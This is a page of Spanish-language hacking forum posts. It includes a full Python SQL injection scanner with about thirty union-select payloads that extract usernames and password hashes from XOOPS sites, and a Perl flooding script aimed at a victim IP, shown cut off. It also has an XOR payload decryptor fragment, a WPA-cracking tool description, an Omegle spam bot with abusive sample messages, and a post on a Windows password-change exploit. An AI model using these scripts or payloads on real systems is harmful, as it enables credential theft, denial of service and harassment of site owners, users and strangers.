xor Payload[ecx], DL ;xoring the byte of payload
inc ecx ;Iterator++
inc edx ;KeyIterator++
inc eax
jmp Cipher ;returning to the beggining of the loop
end start

The Ethical Hacking is Trash
#16
Redes y antenas / Moscrack - Ruptura de claves WPA
Julio 26, 2017, 05:03:10 PM
Moscrack es una aplicación Perl diseñado para facilitar la ruptura en las claves WPA en paralelo en un grupo de equipos.

Esto se logra mediante el uso de cualquiera de software de agrupación Mosix, SSH o RSH acceso a un número de nodos.

Con el nuevo marco plugin Moscrack, agrietamiento de hash se ha convertido en posible. SHA256/512, DES, MD5 y Blowfish * Unix hashes de contraseñas pueden ser procesadas con el plugin Dehasher Moscrack.

Algunas de las características Moscrack:


  • API Basic permite la monitorización remota
  • Configuración automática y dinámica de nodos
  • Live CD / USB permite el arranque y olvidarse de configuración de nodo dinámico
  • Se puede ampliar mediante el uso de plugins
  • Utiliza aircrack-ng (incluyendo 1.2 Beta) por defecto
  • Soporte CUDA / OpenCL través Pyrit Plugin
  • Apoyo a través de CUDA aircrack-ng-cuda (no probado)
  • No requiere de un agente / daemon en nodos
  • Puede agrietarse / comparar SHA256/512, DES, MD5 y Blowfish hashes través Dehasher Plugin
  • Soporta fácilmente un gran número de nodos
  • Desgined para funcionar durante largos períodos de tiempo
  • No salir de errores / fallos cuando sea posible
  • Admite configuraciones de sistema operativo mixto / protocolo
  • Soporta SSH, RSH, Mosix para la conectividad de nodo
  • Maneja efectivamente los nodos o enlaces rápidos y lentos mixtos
  • Arquitectura independiente
  • Soporta software de clustering Mosix
  • Soporta todos los sistemas operativos más utilizados como nodos de procesamiento
  • Priorización de nodo basado en la velocidad
  • Los nodos pueden ser añadido / borrado / modificado mientras Moscrack se está ejecutando
  • Muy detallado, no esconde nada, registra agresivamente
  • Incluye un "top" como visor de estado
  • Incluye CGI visor de estado web
  • Incluye una GUI X11 básico opcional




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!!
#17
Python / Xoops Scan Sql
Julio 26, 2017, 09:58:12 AM

Código: python
#!/usr/bin/python
#XOOPS Module SQL scanner, checks source for md5's


#Uncomment line 63 for verbose mode. If md5 found
#check manually.


#d3hydr8[at]gmail[dot]com


import sys, urllib2, re, time


print "\n\t   d3hydr8[at]gmail[dot]com XOOPScan v1.0"
print "\t------------------------------------------"


sqls = ["modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*",
"modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/articles/index.php?cat_id=-1%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/articles/index.php?cat_id=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3,4%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/friendfinder/view.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myads/index.php?pa=view&cid=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3%20from%20xoops_users/*",
"modules/repository/viewcat.php?cid=111111%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/core/viewcat.php?cid=99999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/core/viewcat.php?cid=98989898%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/ecal/display.php?katid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),user,char(112,97,115,115,119,111,114,100,58),password),2%20from%20mysql.user/*",
"modules/tinyevent/index.php?op=show&id=999999%20union%20select%201,2,3,4,concat(char(117,115,101,114,110,97,109,101,45,45),uname,char(112,97,115,115,119,111,114,100,45,45),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/kshop/product_details.php?id=9999999%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6,7,8,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/camportail/show.php?op=showcam&camid=999999%20union%20select%201,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),7,8,9,1,02,3,4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myalbum/viewcat.php?cid=9999999%20union%20select%201111,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/wfsection/print.php?articleid=9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/zmagazine/print.php?articleid=9999999%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),5,6,7,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/rha7downloads/visit.php?cid=-1&lid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/wflinks/viewcat.php?cid=-1%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/jobs/index.php?pa=jobsview&cid=-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/glossaire/glossaire-p-f.php?op=ImprDef&sid=999999%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2,3%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myconference/index.php?sid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass,char(98,105,116,101,114))%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myTopics/print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20",
"modules/eEmpregos/index.php?pa=view&cid=-00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202",
"modules/classifieds/index.php?pa=Adsview&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1",
"modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme",
"modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass",
"modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*",
"modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*",
"modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*",
"modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*",
"modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*"]


if len(sys.argv) != 2:
print "\nUsage: ./xoopscan.py <site>"
print "Ex: ./xoopscan.py www.test.com\n"
sys.exit(1)


host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
host = host+"/"
if host[:7] != "http://":
host = "http://"+host

print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)


print "[+] Starting Scan...\n"
for sql in sqls:
time.sleep(3) #Change this if needed
#print "[+] Trying:",host+sql.replace("\n","")
try:
source = urllib2.urlopen(host+sql.replace("\n","")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
print "[!]",host+sql.replace("\n","")
for md5 in md5s:
print "\n[+]MD5:",md5
except(urllib2.HTTPError,urllib2.URLError):
pass
print "\n[-] Done\n"
#18
Hacking / CS-Omegle-Bot
Julio 25, 2017, 01:03:35 PM
Les dejo este script para spamear omegle un chat al azar:


CS Omegle Bot will help you to send automatic messages to stranger. You can add interest and can pre define upto 4 messages. While entering interest make sure to add comma.Dependencies



  • Python
  • Selenium
  • PyVirtualDisplay

Código: text

Usage :

$ python CS.Omegle.Bot.py
Enter the interests Example. friends,girls,fag, >> girls,friends,love,justin bieber
Enter your first message (1/4) >> Hi...
Enter your second message (2/4) >> You are a FAG
Enter your third message (3/4) >> You Look stupid
Enter your fourth message (4/4) >> Go away
Enter y to use proxy and n to not use proxy >> n



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
C# - VB.NET / Src Bootnet + Login User
Julio 24, 2017, 11:09:09 PM





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#20

Código: text
▼ 1 The Mobile Risk Ecosystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
The Mobile Ecosystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Scale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Perceived Insecurity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
The Mobile Risk Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Physical Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Service Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
App Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Our Agenda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
▼ 2 Hacking the Cellular Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Basic Cellular Network Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Interoperability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Voice Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
The Control Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Voice Mailboxes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Short Message Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Attacks and Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
The Brave New World of IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
▼ 3 iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Know Your iPhone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
How Secure Is iOS? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Jailbreaking: Unleash the Fury! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Boot-based Jailbreak . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
00_FM.indd xiii 6/19/2013 12:33:23 AM
xiv Hacking Exposed: Mobile Security Secrets & Solutions
Hacking Other iPhones: Fury, Unleashed! . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
▼ 4 Android . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Security Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Application Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Data Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Near Field Communication (NFC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Android Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Emulator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Debug Bridge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Rooting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Decompiling and Disassembly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Decompiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Intercepting Network Traffi c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Adding Trusted CA Certifi cates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Confi guring a Proxy Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Intent-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
NFC-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Information Leakage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via Internal Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via External Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
Information Leakage via Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Information Leakage via Insecure Components . . . . . . . . . . . . . . . . . 113
General Mitigation Strategies to Prevent Information Leakage . . . . 117
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
▼ 5 Mobile Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Android Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
iOS Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
Malware Security: Android vs. iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
▼ 6 Mobile Services and Mobile Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
General Web Service Security Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Attacks Against XML-based Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Common Authentication and Authorization Frameworks . . . . . . . . . . . . . . 155
OAuth 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
SAML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Mobile Web Browser and WebView Security . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting Custom URI Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting JavaScript Bridges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
00_FM.indd xiv 6/19/2013 12:33:23 AM
Contents xv
▼ 7 Mobile Device Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
MDM Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Device Provisioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Bypassing MDM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196
Decompiling and Debugging Apps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Detecting Jailbreaks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
Remote Wipe and Lock . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
▼ 8 Mobile Development Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Mobile App Threat Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Assets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Finishing and Using the Threat Model . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Development Guidance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Application Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . 221
Testing to Make Sure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
For Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233
▼ 9 Mobile Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
Current Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
Contactless Smartcard Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Mobile Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Google Wallet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Square . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
▼ A Consumer Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
▼ B Mobile Application Penetration Testing Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
iOS Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
Android Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266


Enlace de descarga:
Código: text
https://jumpshare.com/v/f92aUO9UkSXbhSnHyo5f
#21
Buenas, esto no es tan nuevo pero no lo vi en el foro :D


Bueno el siguiente exploit sirve para cambiar la Password de usuarios sin tener privilegios, veamos:


Ejecutamos la consola y el net user "pass" para intentar cambiar, (todo sin el exploit aun)


Como vemos no nos deja cambiar la password,

Probemos ahora con el exploit:


y Listo.

les dejo la web donde pueden descargarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ademas de eso un video que busque en youtube ya que no tenia tiempo para hacer uno:


Saludos!
#22
Perl / [Perl] - Spoofed Attack script
Julio 24, 2017, 10:12:10 AM

Código: perl
#!/usr/bin/perluse Term::ANSIColor;
use Net::RawIP;
use IO::Socket::INET;


( $PROG = $0 ) =~ s/^.*[\/\\]//;


if ( @ARGV == 0 ) {
        print "Usage : ./$PROG [IP] [Port] [Time] [Protocol] \n\n";
        print "Protocols :  \n\n-UDP\n-TCP\n-ICMP\n-HTTP\n";
    exit;
}


my $size = 'ABABABAZERTYUIOP1234567890CD123456789AZERTYUIOPQSDFGHJKLMEFGHIJKLMNOPKRSTUVWXYZ​CDEFEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrGEFGHIJKLMNOPQRSTUVWXYZ1234​56789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKL​MNOPQRSTUVWXYZ123456789abcdefghijklmnopqrHIJKLMNOPQREFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKLMN​OPQRSTUVWXYZ123456789abcdefghijklmnopqrSTUVWXYZ123456789abcdefghijklmnopqrstuvwx​yzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ​RSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789a​bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrst​uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM​NOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS​TUVWXYZ123456789abcdefghijklmnopqrstuvwxyz';
my $victime = $ARGV[0];
my $port = $ARGV[1];
my $temps = $ARGV[2];
my $proto = $ARGV[3];
$endtime = time() + ($temps ? $temps : 1000000);














my @referer = ('http://www.google.com/url?sa=t&rct=j&q=&eip_source=s&source=web&cd=1&url=$victime');


my @agent = ('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows; I; Windows NT 5.1; ru; rv:1.9.2.13)',
'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; LNV-Lenovo K910e/S100; 1080*1920; CTC/2.0) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safa',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Lynx/2.8.8dev.12 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.12.14',
'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (compatible; Konqueror/3.5; SunOS)',
'Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9)');


my $foke =
"\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30".
"\x48\x6f\x73\x74\x3a\x20\0x687474703a2f2f", pack("H*", $victime).
"\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e​\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x75\x72\x6c\x3f\x73\x61\x3d\x74\x26​\x72\x63\x74\x3d\x6a\x26\x71\x3d\x26\x65\x73\x72\x63\x3d\x73\x26\x73\x6f\x75\x72​\x63\x65\x3d\x77\x65\x62\x26\x63\x64\x3d\x31\x26\x75\x72\x6c\x3d\0x687474703a2f2​f", pack("H*", $victime).
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69​\x76\x65";


my $reqq =
"POST / HTTP/1.0\r\n".
"Referer: {foreach (sort {int(rand(1))-1} @referer)}\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Connection: Keep-Alive\r\n".
"User-Agent: {foreach (sort {int(rand(1))-1} @agent)}\r\n".
"Host: $victime\r\n".
"\r\n".
